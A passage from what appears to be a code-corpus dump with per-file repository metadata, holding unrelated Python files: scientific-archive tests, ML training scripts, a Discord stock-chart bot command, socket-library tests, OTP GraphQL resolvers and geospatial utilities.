| 0
| 0
| 0
| 0
| 195
| 0.248724
|
6584791fe17e82f5787899fa97ce0db3fa35bfb0
| 1,535
|
py
|
Python
|
uhelpers/tests/test_archive_helpers.py
|
Johannes-Sahlmann/uhelpers
|
58f8e25ef8644ab5b24a5be76fd58a338a400912
|
[
"BSD-3-Clause"
] | null | null | null |
uhelpers/tests/test_archive_helpers.py
|
Johannes-Sahlmann/uhelpers
|
58f8e25ef8644ab5b24a5be76fd58a338a400912
|
[
"BSD-3-Clause"
] | 2
|
2020-12-21T18:08:48.000Z
|
2021-01-26T01:24:39.000Z
|
uhelpers/tests/test_archive_helpers.py
|
Johannes-Sahlmann/uhelpers
|
58f8e25ef8644ab5b24a5be76fd58a338a400912
|
[
"BSD-3-Clause"
] | 5
|
2019-10-02T14:16:15.000Z
|
2021-12-27T18:46:18.000Z
|
#!/usr/bin/env python
"""Tests for the jwcf hawki module.
Authors
-------
Johannes Sahlmann
"""
import netrc
import os
from astropy.table import Table
import pytest
from ..archive_helpers import get_exoplanet_orbit_database, gacs_list_query
local_dir = os.path.dirname(os.path.abspath(__file__))
ON_TRAVIS = os.environ.get('TRAVIS') == 'true'
@pytest.mark.skipif(ON_TRAVIS, reason='timeout issue.')
def test_eod():
"""Test the access to the exoplanet orbit database."""
catalog = get_exoplanet_orbit_database(local_dir, verbose=False)
assert len(catalog) > 100
@pytest.mark.skipif(ON_TRAVIS, reason='Requires access to .netrc file.')
def test_gacs_list_query():
# print('test gacs list query')
# Define which host in the .netrc file to use
HOST = 'http://gea.esac.esa.int'
# Read from the .netrc file in your home directory
secrets = netrc.netrc()
username, account, password = secrets.authenticators(HOST)
out_dir = os.path.dirname(__file__)
T = Table()
id_str_input_table = 'ID_HIP'
T[id_str_input_table] = [1, 2, 3, 4, 5, 6, 7]
gacs_table_name = 'tgas_source'
id_str_gacs_table = 'hip'
input_table_name = 'hip_star_list'
input_table = os.path.join(out_dir, 'hip_star_list.vot')
T[[id_str_input_table]].write(input_table, format='votable', overwrite=1)
T_out = gacs_list_query(username, password, out_dir, input_table, input_table_name, gacs_table_name,
id_str_gacs_table, id_str_input_table)
T_out.pprint()
| 29.519231
| 104
| 0.70684
| 0
| 0
| 0
| 0
| 1,178
| 0.767427
| 0
| 0
| 437
| 0.284691
|
6584f2d684176e56a028fa83fba17e1495411607
| 1,264
|
py
|
Python
|
TP3/test.py
|
paul-arthurthiery/IAMethodesAlgos
|
f49fe17c278424588df263ab0e6778721cbc4394
|
[
"MIT"
] | null | null | null |
TP3/test.py
|
paul-arthurthiery/IAMethodesAlgos
|
f49fe17c278424588df263ab0e6778721cbc4394
|
[
"MIT"
] | null | null | null |
TP3/test.py
|
paul-arthurthiery/IAMethodesAlgos
|
f49fe17c278424588df263ab0e6778721cbc4394
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 2 14:33:13 2018
@author: Nathan
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
# load dataset
data,target =load_iris().data,load_iris().target
# split data in train/test sets
X_train, X_test, y_train, y_test = train_test_split( data, target, test_size=0.33, random_state=42)
# standardize columns using normal distribution
# fit on X_train and not on X_test to avoid Data Leakage
s = StandardScaler()
X_train = s.fit_transform(X_train)
X_test = s.transform(X_test)
from SoftmaxClassifier import SoftmaxClassifier
# import the custom classifier
cl = SoftmaxClassifier()
# train on X_train and not on X_test to avoid overfitting
train_p = cl.fit_predict(X_train,y_train)
test_p = cl.predict(X_test)
from sklearn.metrics import precision_recall_fscore_support
# display precision, recall and f1-score on train/test set
print("train : "+ str(precision_recall_fscore_support(y_train, train_p,average = "macro")))
print("test : "+ str(precision_recall_fscore_support(y_test, test_p,average = "macro")))
import matplotlib.pyplot as plt
plt.plot(cl.losses_)
plt.show()
| 26.333333
| 99
| 0.77769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 431
| 0.340981
|
65850e2ff2df32252ae9c695f9a58c5a8d385efe
| 1,013
|
py
|
Python
|
HUGGINGFACE.py
|
mkingopng/NBME_score_clinical_patient_notes
|
4ca9816be2665d7585ab0d168376a340aa800088
|
[
"MIT"
] | 1
|
2022-03-27T12:47:25.000Z
|
2022-03-27T12:47:25.000Z
|
HUGGINGFACE.py
|
mkingopng/NBME_score_clinical_patient_notes
|
4ca9816be2665d7585ab0d168376a340aa800088
|
[
"MIT"
] | null | null | null |
HUGGINGFACE.py
|
mkingopng/NBME_score_clinical_patient_notes
|
4ca9816be2665d7585ab0d168376a340aa800088
|
[
"MIT"
] | null | null | null |
import os
TRANSFORMERS = '/home/noone/documents/github/transformers'
TOKENIZERS = '/home/noone/documents/github/tokenizers'
DATASETS = '/home/noone/documents/github/datasets'
MODELS = os.path.join(TRANSFORMERS, 'src/transformers/models')
DEBERTA_V2 = os.path.join(MODELS, 'deberta_v2')
DEBERTA_V3 = os.path.join(MODELS, 'deberta-v3-base')
ENCODER_DECODER = os.path.join(MODELS, 'encoder_decoder')
HUGGINGFACE_HUB = '/home/noone/documents/github/huggingface_hub'
"""
Huggingface Repos Cloned:
- transformers
- tokenizers
= optimum
- datasets
- huggingface_hub
- accelerate
- notebooks
- blog
- huggingface sagemaker snowflake example
- education toolkit
- evaluate
- knockknock
- neuralcoref
- mongoku
- data-measurements-tool
- neural compressor
- allennlp
- pytorch-openai-transformer-lm
- pytorch pretrained bigGAN
- awesome NLP discussion papers
- torchMoji
- naacl_transfer_learning_tutorial
-
"""
| 22.021739
| 64
| 0.699901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 781
| 0.770977
|
65852219b6e7161ca8a0d874955000bd7586ea4b
| 830
|
py
|
Python
|
Curso_em_Video_Exercicios/ex068.py
|
Cohuzer/Exercicios-do-Curso-em-Video
|
879cbb53c54ba226e12d9972bc28eadcd521fc10
|
[
"MIT"
] | null | null | null |
Curso_em_Video_Exercicios/ex068.py
|
Cohuzer/Exercicios-do-Curso-em-Video
|
879cbb53c54ba226e12d9972bc28eadcd521fc10
|
[
"MIT"
] | null | null | null |
Curso_em_Video_Exercicios/ex068.py
|
Cohuzer/Exercicios-do-Curso-em-Video
|
879cbb53c54ba226e12d9972bc28eadcd521fc10
|
[
"MIT"
] | null | null | null |
#Par ou Impar- para qnd o jogador perder e mostra o tanto de vitoria consecutivas
from random import randint
c = 0
while True:
print('\033[1;33m-' * 30)
n = int(input('ESCOLHA UM NÚMERO: '))
e = str(input('PAR OU IMPAR? ')).strip().upper()[0]
print('-' * 30)
j = randint(0, 10)
if e == 'P':
if (n + j) % 2 == 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif (n + j) % 2 != 0:
break
elif e == 'I':
if (n + j) % 2 == 0:
break
elif (n + j) % 2 != 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif e not in 'PI':
print('\033[1;31mOPÇÃO INVALIDA, TENTE DENOVO!')
print(f'\033[1;31mGAME OVER!\nEU ESCOLHI {j} E VOCÊ {n}\nVOCÊ FEZ UMA SEQUENCIA DE {c} PONTOS!')
| 33.2
| 96
| 0.503614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 367
| 0.437426
|
65870cdea10ace0d94e2b600195f694036787b41
| 1,727
|
py
|
Python
|
tests/test_write.py
|
AlexsanderShaw/libdesock
|
5945a5ab0f002078fc6eaaf7e20e2b7b66c67086
|
[
"MIT"
] | 88
|
2022-02-26T20:59:53.000Z
|
2022-03-21T21:29:09.000Z
|
tests/test_write.py
|
fkie-cad/libdesock
|
3d20862e9cfd18e20bdeb599ab2f39e20e94373c
|
[
"MIT"
] | null | null | null |
tests/test_write.py
|
fkie-cad/libdesock
|
3d20862e9cfd18e20bdeb599ab2f39e20e94373c
|
[
"MIT"
] | 7
|
2022-02-27T01:42:00.000Z
|
2022-03-07T03:06:32.000Z
|
"""
This file tests that sendmmsg works correctly.
Target files:
- libdesock/src/write.c
"""
import ctypes
import desock
import helper
data = bytes(range(65, 115))
cursor = 0
def _get_data(size):
global cursor
ret = bytes(data[cursor: cursor + size])
assert(len(ret) == size)
cursor += size
return ret
def test_sendmmsg():
fd = desock._debug_instant_fd(0)
assert(desock.sendmmsg(fd, None, 0, 0) == 0)
mmsghdrs = (desock.mmsghdr * 2)()
mmsghdrs[0] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
mmsghdrs[1] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
with helper.StdoutPipe() as pipe:
assert(desock.sendmmsg(fd, mmsghdrs, 2, 0) == 2)
assert(pipe.read(50) == data)
def test_sendto():
data = ctypes.create_string_buffer(bytes(range(128)))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendto(fd, data, 128, 0, None, 0) == 128)
assert(pipe.read(128) == data[:128])
def test_sendmsg():
global cursor
cursor = 0
msghdr = helper.create_msghdr(iov=helper.create_iovec(5, 10, datafunc=_get_data))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendmsg(fd, msghdr, 0) == 50)
assert(pipe.read(50) == data)
def test_writev():
global cursor
cursor = 0
iov = helper.create_iovec(5, 10, datafunc=_get_data)
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.writev(fd, iov, 5) == 50)
assert(pipe.read(50) == data)
| 27.854839
| 112
| 0.643891
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 97
| 0.056167
|
6587d36784219790a446003c11e770c4bed4d07f
| 8,409
|
py
|
Python
|
ratin_cpython/common/common.py
|
openearth/eo-rivers
|
752f90aed92fa862a2c107bb58bcae298c1bf313
|
[
"MIT"
] | 2
|
2018-10-19T03:20:08.000Z
|
2020-05-06T22:56:20.000Z
|
ratin_cpython/common/common.py
|
openearth/eo-river
|
752f90aed92fa862a2c107bb58bcae298c1bf313
|
[
"MIT"
] | 11
|
2018-06-05T09:41:15.000Z
|
2021-11-15T17:47:27.000Z
|
ratin_cpython/common/common.py
|
openearth/eo-rivers
|
752f90aed92fa862a2c107bb58bcae298c1bf313
|
[
"MIT"
] | 2
|
2020-10-15T12:29:36.000Z
|
2021-12-13T22:53:58.000Z
|
import numpy as np
from math import factorial
import scipy.signal
#Gaussian filter with convolution - faster and easier to handle
## Degree is equal to the number of values left and right of the central value
## of the gaussian window:
## ie degree=3 yields a window of length 7
## It uses normalized weights (sum of weights = 1)
## Based on:
## http://en.wikipedia.org/wiki/Gaussian_filter
## http://en.wikipedia.org/wiki/Standard_deviation
## http://en.wikipedia.org/wiki/Window_function#Gaussian_window
def smooth(array_in, degree=5):
'''
Gaussian smooth line using a window of specified degree (=half-length)
'''
degree = int(degree) #make sure it is of integer type
n = 2*degree+1
if degree <= 0:
return array_in
if type(array_in) == type(np.array([])) and len(array_in.shape)>1:
array_in = array_in.flatten()
array_in = list(array_in)
# If degree is larger than twice the original data, make it smaller
if len(array_in) < n:
degree = len(array_in)/2
n = 2*degree+1
print "Changed smoothing degree to:",degree
#extend the array's initial and ending values with equal ones, accordingly
array_in = np.array( [array_in[0]]*degree + array_in + [array_in[-1]]*degree )
#TODO: These parameters are subject to change - depends on the implementation
# Gaussian parameters:
x = np.linspace(-degree,degree,n)
sigma = np.sqrt( sum( (x-np.mean(x))**2 ) / n )
alpha = 1.0 / (2.0 * sigma**2)
weight = np.sqrt(alpha/np.pi) * np.exp(-alpha*x**2 ) #gaussian
weights = weight / sum(weight) #normalize
return np.convolve(array_in, weights, 'valid')
#TODO: revise
#Gaussian 2D smoothing, anisotropic
## http://homepages.inf.ed.ac.uk/rbf/HIPR2/gsmooth.htm
def smooth2D(matrix_in, fill, degree=5, sigma=2.0, a=1.0, b=1.0):
'''
Gaussian smooth matrix using a window of specified degree
'''
kx, ky = np.arange(-degree,degree+1.0),np.arange(-degree,degree+1.0)
kernel = np.zeros([kx.shape[0],ky.shape[0]])
for i in range(len(kx)):
for j in range(len(ky)):
kernel[i,j] = 1./(2*np.pi*sigma**2) * np.exp( -(b*kx[i]**2+a*ky[j]**2)/(2*sigma**2) )
kernel /= kernel.sum()
matrix_out = scipy.signal.convolve2d(matrix_in, kernel, mode='same', fillvalue=fill)
return matrix_out
def get_direction(x, y, smoothdegree=0, units='degrees'):
'''
Return direction (cartesian reference) of point
The direction of each point is calculated as the mean of directions
on both sides
'''
#Calculate direction in RADIANS
direction = np.array([])
#first point: Can determine direction only based on next point
direction = np.append(direction,np.angle((x[1]-x[0])+(y[1]-y[0])*1j))
for j in range(1, len(x)-1):
# Base direction on points before and after current point
direction = np.append(direction,np.angle((x[j+1]-x[j-1])+(y[j+1]-y[j-1])*1j))
#last point: Can determine direction only based on previous point
direction = np.append(direction,np.angle((x[-1]-x[-2])+(y[-1]-y[-2])*1j))
#fix 'jumps' in data
direction = fix_angle_vector(direction)
#Smoothing - do not perform if input degree is equal/less than 0.0
if smoothdegree <= 0.0:
pass
else:
direction = smooth(direction, degree=smoothdegree)
#TODO: Review! Do we need to confine it?
#Limit the representation in the space of [0,2*pi]
gaps = np.where(np.abs(direction) > np.radians(360.0))[0]
direction[gaps] -= np.radians(360.0)
if units=='radians':
pass
elif units == 'degrees':
direction = np.degrees(direction)
return direction
def distance(p1, p2):
"""
Distance in between two points (given as tuples)
"""
dist = np.sqrt( (p2[0]-p1[0])**2 + (p2[1]-p1[1])**2 )
return dist
def distance_matrix(x0, y0, x1, y1, aniso):
"""
Returns distances between points in a matrix formation.
An anisotropy factor is set as input. If >1, the points in
x direction shift closer. If <1, the points in x direction
shift further apart. If =1, normal distances are computed.
"""
aniso = float(aniso)
x0 = np.array(x0).flatten()
y0 = np.array(y0).flatten()
x1 = np.array(x1).flatten()
y1 = np.array(y1).flatten()
#transpose observations
vertical = np.vstack((x0, y0)).T
horizontal = np.vstack((x1, y1)).T
# Make a distance matrix between pairwise observations
# Note: from <http://stackoverflow.com/questions/1871536>
if aniso<=0.0:
print "Warning: Anisotropy factor cannot be 0 or negative; set to 1.0."
aniso = 1.0
d0 = np.subtract.outer(vertical[:,0], horizontal[:,0]) * (1./aniso)
d1 = np.subtract.outer(vertical[:,1], horizontal[:,1])
return np.hypot(d0, d1)
#retrieve s values streamwise
def get_chainage(x, y):
"""
Get chain distances for a set of continuous points
"""
s = np.array([0.0]) #start
for j in range(1,len(x)):
s = np.append( s, s[j-1] + distance([x[j-1],y[j-1]], [x[j],y[j]]) )
return s
def to_sn(Gx, Gy):
"""
Transform (Gx,Gy) Cartesian coordinates to flow-oriented ones (Gs,Gn),
where Gx and Gy stand for gridded x and gridded y, and Gs and Gn are their
transformed counterparts.
Gx,Gy,Gs,Gn are all numpy arrays in the form of matrices.
"""
rows, cols = Gx.shape
#find s-direction coordinates
midrow = int(rows/2)
c_x = Gx[midrow,:]
c_y = Gy[midrow,:]
Salong = get_chainage(c_x,c_y)
#all s-direction points have the same spacing
Gs = np.tile(Salong, (rows,1)) #"stretch" all longitudinals
#find n-direction coordinates
Gn = np.zeros([rows,cols])
for j in range(cols): #for each column
Gn[midrow::-1,j] = -get_chainage(Gx[midrow::-1,j],Gy[midrow::-1,j])
Gn[midrow:,j] = get_chainage(Gx[midrow:,j],Gy[midrow:,j])
return Gs, Gn
def to_grid(data, rows, cols):
"""
Transform a list of data to a grid-like (matrix) form of specified shape
"""
data = np.array(data).flatten()
return data.reshape(rows,cols)
##??['Brute-force' way but works correctly]
def fix_angle_vector(theta):
'''
Fixes a vector of angles (in radians) that show 'jumps' because of changes
between 360 and 0 degrees
'''
thetadiff = np.diff(theta)
gaps = np.where(np.abs(thetadiff) > np.radians(180))[0]
while len(gaps)>0:
gap = gaps[0]
if thetadiff[gap]<0:
theta[gap+1:] += np.radians(360)
else:
theta[gap+1:] -= np.radians(360)
thetadiff = np.diff(theta)
gaps = np.where(np.abs(thetadiff) > np.radians(180))[0]
return theta
def get_parallel_line(x, y, direction, distance, units = 'degrees'):
'''
Create parallel lines for representation of MAT path.
'''
if units == 'degrees':
direction = np.radians(direction)
perpendicular_direction = np.array(direction)+0.5*np.pi
xn = np.array(x)+np.array(distance)*np.array(np.cos(perpendicular_direction))
yn = np.array(y)+np.array(distance)*np.array(np.sin(perpendicular_direction))
return xn, yn
#http://wiki.scipy.org/Cookbook/SavitzkyGolay
def savitzky_golay(y, window_size, order, deriv=0, rate=1):
try:
window_size = np.abs(np.int(window_size))
order = np.abs(np.int(order))
except ValueError, msg:
raise ValueError("window_size and order have to be of type int", msg)
if window_size % 2 != 1 or window_size < 1:
raise TypeError("window_size size must be a positive odd number")
if window_size < order + 2:
raise TypeError("window_size is too small for the polynomials order")
order_range = range(order+1)
half_window = (window_size -1) // 2
# precompute coefficients
b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])
m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)
# pad the signal at the extremes with
# values taken from the signal itself
firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )
lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])
y = np.concatenate((firstvals, y, lastvals))
return np.convolve( m[::-1], y, mode='valid')
| 35.331933
| 97
| 0.631704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,277
| 0.389702
|
658815cb00ae7e0794df13b589c297b74cf7ffbd
| 3,879
|
py
|
Python
|
discordbot/stocks/technical_analysis/rsi.py
|
Aerex/GamestonkTerminal
|
680e0cd278f0d8e45031cdc9d51f247e9aa90ce1
|
[
"MIT"
] | 3
|
2021-02-28T09:54:47.000Z
|
2021-03-11T17:42:35.000Z
|
discordbot/stocks/technical_analysis/rsi.py
|
Aerex/GamestonkTerminal
|
680e0cd278f0d8e45031cdc9d51f247e9aa90ce1
|
[
"MIT"
] | 3
|
2022-02-28T03:37:52.000Z
|
2022-02-28T03:37:53.000Z
|
discordbot/stocks/technical_analysis/rsi.py
|
Aerex/GamestonkTerminal
|
680e0cd278f0d8e45031cdc9d51f247e9aa90ce1
|
[
"MIT"
] | 1
|
2021-11-20T16:09:48.000Z
|
2021-11-20T16:09:48.000Z
|
import os
from datetime import datetime, timedelta
import discord
from matplotlib import pyplot as plt
import discordbot.config_discordbot as cfg
from discordbot.run_discordbot import gst_imgur
import discordbot.helpers
from gamestonk_terminal.helper_funcs import plot_autoscale
from gamestonk_terminal.common.technical_analysis import momentum_model
from gamestonk_terminal.config_plot import PLOT_DPI
async def rsi_command(
ctx, ticker="", length="14", scalar="100", drift="1", start="", end=""
):
"""Displays chart with relative strength index [Yahoo Finance]"""
try:
# Debug
if cfg.DEBUG:
print(f"!stocks.ta.rsi {ticker} {length} {scalar} {drift} {start} {end}")
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if start == "":
start = datetime.now() - timedelta(days=365)
else:
start = datetime.strptime(start, cfg.DATE_FORMAT)
if end == "":
end = datetime.now()
else:
end = datetime.strptime(end, cfg.DATE_FORMAT)
if not length.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
length = float(length)
if not scalar.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
scalar = float(scalar)
if not drift.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
drift = float(drift)
ticker = ticker.upper()
df_stock = discordbot.helpers.load(ticker, start)
if df_stock.empty:
raise Exception("Stock ticker is invalid")
# Retrieve Data
df_stock = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = momentum_model.rsi("1440min", df_stock, length, scalar, drift)
# Output Data
fig, axes = plt.subplots(2, 1, figsize=plot_autoscale(), dpi=PLOT_DPI)
ax = axes[0]
ax.plot(df_stock.index, df_stock["Adj Close"].values, "k", lw=2)
ax.set_title(f" {ticker} RSI{length} ")
ax.set_xlim(df_stock.index[0], df_stock.index[-1])
ax.set_ylabel("Share Price ($)")
ax.grid(b=True, which="major", color="#666666", linestyle="-")
ax2 = axes[1]
ax2.plot(df_ta.index, df_ta.values, "b", lw=2)
ax2.set_xlim(df_stock.index[0], df_stock.index[-1])
ax2.axhspan(70, 100, facecolor="r", alpha=0.2)
ax2.axhspan(0, 30, facecolor="g", alpha=0.2)
ax2.axhline(70, linewidth=3, color="r", ls="--")
ax2.axhline(30, linewidth=3, color="g", ls="--")
ax2.grid(b=True, which="major", color="#666666", linestyle="-")
ax2.set_ylim([0, 100])
ax3 = ax2.twinx()
ax3.set_ylim(ax2.get_ylim())
ax3.set_yticks([30, 70])
ax3.set_yticklabels(["OVERSOLD", "OVERBOUGHT"])
plt.gcf().autofmt_xdate()
fig.tight_layout(pad=1)
plt.savefig("ta_rsi.png")
uploaded_image = gst_imgur.upload_image("ta_rsi.png", title="something")
image_link = uploaded_image.link
if cfg.DEBUG:
print(f"Image URL: {image_link}")
title = "Stocks: Relative-Strength-Index " + ticker
embed = discord.Embed(title=title, colour=cfg.COLOR)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
embed.set_image(url=image_link)
os.remove("ta_rsi.png")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(
title="ERROR Stocks: Relative-Strength-Index",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
| 34.026316
| 85
| 0.60299
| 0
| 0
| 0
| 0
| 0
| 0
| 3,471
| 0.894818
| 651
| 0.167827
|
65894aac96ac4562697b30a8369779ac8960ace4
| 5,011
|
py
|
Python
|
train.py
|
xushenkun/vae
|
35e136257e5a3122b92dff9961dd08585b7cce2d
|
[
"MIT"
] | 1
|
2020-09-19T00:03:59.000Z
|
2020-09-19T00:03:59.000Z
|
train.py
|
xushenkun/vae
|
35e136257e5a3122b92dff9961dd08585b7cce2d
|
[
"MIT"
] | null | null | null |
train.py
|
xushenkun/vae
|
35e136257e5a3122b92dff9961dd08585b7cce2d
|
[
"MIT"
] | null | null | null |
import argparse
import os
import shutil
import numpy as np
import torch as t
from torch.optim import Adam
from utils.batch_loader import BatchLoader
from utils.parameters import Parameters
from model.rvae_dilated import RVAE_dilated
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='RVAE_dilated')
parser.add_argument('--num-epochs', type=int, default=25000, metavar='ES',
help='num epochs (default: 25000)')
parser.add_argument('--start-epoch', default=0, type=int, metavar='E',
help='manual epoch index (useful on restarts)')
parser.add_argument('--batch-size', type=int, default=45, metavar='BS',
help='batch size (default: 45)')
parser.add_argument('--use-cuda', type=bool, default=True, metavar='CUDA',
help='use cuda (default: True)')
parser.add_argument('--learning-rate', type=float, default=0.0005, metavar='LR',
help='learning rate (default: 0.0005)')
parser.add_argument('--dropout', type=float, default=0.3, metavar='DR',
help='dropout (default: 0.3)')
parser.add_argument('--use-trained', default='', metavar='UT',
help='load pretrained model (default: None)')
parser.add_argument('--ret-result', default='', metavar='CE',
help='ce result path (default: '')')
parser.add_argument('--kld-result', default='', metavar='KLD',
help='ce result path (default: '')')
args = parser.parse_args()
prefix = 'poem'
word_is_char = True
batch_loader = BatchLoader('', prefix, word_is_char)
best_ret = 9999999
is_best = False
if not os.path.exists('data/' + batch_loader.prefix + 'word_embeddings.npy'):
raise FileNotFoundError("word embeddings file was't found")
parameters = Parameters(batch_loader.max_word_len,
batch_loader.max_seq_len,
batch_loader.words_vocab_size,
batch_loader.chars_vocab_size, word_is_char)
rvae = RVAE_dilated(parameters, batch_loader.prefix)
optimizer = Adam(rvae.learnable_parameters(), args.learning_rate)
if args.use_trained:
checkpoint = t.load(args.use_trained)
args.start_epoch = checkpoint['epoch']
best_ret = checkpoint['best_ret']
rvae.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
if args.use_cuda and t.cuda.is_available():
rvae = rvae.cuda()
train_step = rvae.trainer(optimizer, batch_loader)
validate = rvae.validater(batch_loader)
ret_result = []
kld_result = []
for epoch in range(args.start_epoch, args.num_epochs):
train_ret, train_kld, train_kld_coef = train_step(epoch, args.batch_size, args.use_cuda and t.cuda.is_available(), args.dropout)
train_ret = train_ret.data.cpu().numpy()[0]
train_kld = train_kld.data.cpu().numpy()[0]
valid_ret, valid_kld = validate(args.batch_size, args.use_cuda and t.cuda.is_available())
valid_ret = valid_ret.data.cpu().numpy()[0]
valid_kld = valid_kld.data.cpu().numpy()[0]
ret_result += [valid_ret]
kld_result += [valid_kld]
is_best = valid_ret < best_ret
best_ret = min(valid_ret, best_ret)
print('[%s]---TRAIN-ret[%s]kld[%s]------VALID-ret[%s]kld[%s]'%(epoch, train_ret, train_kld, valid_ret, valid_kld))
if epoch != 1 and epoch % 10 == 9:
seed = np.random.normal(size=[1, parameters.latent_variable_size])
sample = rvae.sample(batch_loader, 50, seed, args.use_cuda and t.cuda.is_available(), None, 1)
print('[%s]---SAMPLE: %s'%(epoch, sample))
if epoch != 0 and epoch % 100 == 99:
checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, epoch+1)
t.save({'epoch': epoch+1,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, checkpoint_filename)
oldest = epoch+1-3*100
oldest_checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, oldest) if oldest>0 else None
if oldest_checkpoint_filename and os.path.isfile(oldest_checkpoint_filename):
os.remove(oldest_checkpoint_filename)
if is_best:
shutil.copyfile(checkpoint_filename, './data/'+batch_loader.prefix+'trained_best_RVAE')
t.save({'epoch': args.num_epochs,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, './data/'+batch_loader.prefix+'trained_last_RVAE')
np.save(batch_loader.prefix+'ret_result_{}.npy'.format(args.ret_result), np.array(ret_result))
np.save(batch_loader.prefix+'kld_result_npy_{}'.format(args.kld_result), np.array(kld_result))
| 43.95614
| 136
| 0.631411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 882
| 0.176013
|
658c87d29e07d35154d2bbcefbc473d8ad660860
| 1,152
|
py
|
Python
|
renovation_core_graphql/auth/otp.py
|
e-lobo/renovation_core_graphql
|
31e464e00badc308bf03c70364331b08ad9d1b1d
|
[
"MIT"
] | 1
|
2021-12-15T06:05:06.000Z
|
2021-12-15T06:05:06.000Z
|
renovation_core_graphql/auth/otp.py
|
e-lobo/renovation_core_graphql
|
31e464e00badc308bf03c70364331b08ad9d1b1d
|
[
"MIT"
] | 5
|
2021-06-09T19:00:56.000Z
|
2022-01-23T09:51:13.000Z
|
renovation_core_graphql/auth/otp.py
|
e-lobo/renovation_core_graphql
|
31e464e00badc308bf03c70364331b08ad9d1b1d
|
[
"MIT"
] | 1
|
2021-06-01T05:22:41.000Z
|
2021-06-01T05:22:41.000Z
|
from graphql import GraphQLResolveInfo
import frappe
from renovation_core.utils.auth import generate_otp, verify_otp
VERIFY_OTP_STATUS_MAP = {
"no_linked_user": "NO_LINKED_USER",
"no_otp_for_mobile": "NO_OTP_GENERATED",
"invalid_otp": "INVALID_OTP",
"verified": "VERIFIED",
}
def generate_otp_resolver(obj, info: GraphQLResolveInfo, **kwargs):
r = generate_otp(**kwargs)
r.status = "SUCCESS" if r.status == "success" else "FAILED"
return r
def verify_otp_resolver(obj, info: GraphQLResolveInfo, **kwargs):
kwargs["login_to_user"] = 1 if kwargs.get("login_to_user") else 0
if kwargs["login_to_user"] and kwargs["use_jwt"]:
frappe.local.form_dict.use_jwt = 1
del kwargs["use_jwt"]
status_dict = verify_otp(**kwargs)
status_dict.update(frappe.local.response)
if status_dict.get("user"):
status_dict["user"] = frappe._dict(doctype="User", name=status_dict["user"])
status = status_dict.get("status")
if status in VERIFY_OTP_STATUS_MAP:
status_dict.status = VERIFY_OTP_STATUS_MAP[status]
else:
status_dict.status = "FAILED"
return status_dict
| 29.538462
| 84
| 0.703993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 244
| 0.211806
|
658d5e23890b80d2c423a20bb23bdcaa811dcbe7
| 6,050
|
py
|
Python
|
solaris/utils/core.py
|
mananeau/solaris
|
ca000e8a255bd792ff3f192a6350ff8cace3d050
|
[
"Apache-2.0"
] | null | null | null |
solaris/utils/core.py
|
mananeau/solaris
|
ca000e8a255bd792ff3f192a6350ff8cace3d050
|
[
"Apache-2.0"
] | null | null | null |
solaris/utils/core.py
|
mananeau/solaris
|
ca000e8a255bd792ff3f192a6350ff8cace3d050
|
[
"Apache-2.0"
] | null | null | null |
import os
import numpy as np
from shapely.wkt import loads
from shapely.geometry import Point
from shapely.geometry.base import BaseGeometry
import pandas as pd
import geopandas as gpd
import rasterio
import skimage
from fiona._err import CPLE_OpenFailedError
from fiona.errors import DriverError
from warnings import warn
import pdb
def _check_rasterio_im_load(im):
"""Check if `im` is already loaded in; if not, load it in."""
if isinstance(im, str):
return rasterio.open(im)
elif isinstance(im, rasterio.DatasetReader):
return im
else:
raise ValueError(
"{} is not an accepted image format for rasterio.".format(im))
def _check_skimage_im_load(im):
"""Check if `im` is already loaded in; if not, load it in."""
if isinstance(im, str):
return skimage.io.imread(im)
elif isinstance(im, np.ndarray):
return im
else:
raise ValueError(
"{} is not an accepted image format for scikit-image.".format(im))
def _check_df_load(df):
"""Check if `df` is already loaded in, if not, load from file."""
if isinstance(df, str):
if df.lower().endswith('json'):
return _check_gdf_load(df)
else:
return pd.read_csv(df)
elif isinstance(df, pd.DataFrame):
return df
else:
raise ValueError(f"{df} is not an accepted DataFrame format.")
def _check_gdf_load(gdf):
"""Check if `gdf` is already loaded in, if not, load from geojson."""
if isinstance(gdf, str):
